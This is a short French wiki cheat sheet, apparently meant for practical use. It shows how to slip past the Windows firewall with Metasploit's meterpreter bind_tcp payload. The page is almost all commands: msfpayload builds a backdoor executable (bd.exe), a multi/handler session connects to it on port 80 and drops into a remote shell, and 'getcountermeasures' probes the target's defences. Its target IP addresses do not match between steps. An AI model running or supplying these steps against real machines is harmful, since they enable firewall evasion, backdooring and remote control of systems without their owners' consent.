Firewall windows

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Contournement du pare-feu Windows
Payload windows/meterpreter/bind_tcp
Contexte Metasploit
Voir aussi Meterpreter · Ms08 067

Le payload bind_tcp permet de contourner le pare-feu Windows en écoutant sur un port autorisé de la machine cible (ici 80), plutôt qu'en initiant une connexion sortante.

Génération et handler

msfpayload windows/meterpreter/bind_tcp RHOST=192.168.0.10 LPORT=80 X > bd.exe
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set LPORT 80
set LHOST 192.168.0.10
exploit

Lancer bd.exe sur la cible, puis :

set RHOST 192.168.0.1
rexploit
meterpreter> shell

Contre-mesures observées

meterpreter> run getcountermeasures
meterpreter> run getcountermeasures -d

Voir aussi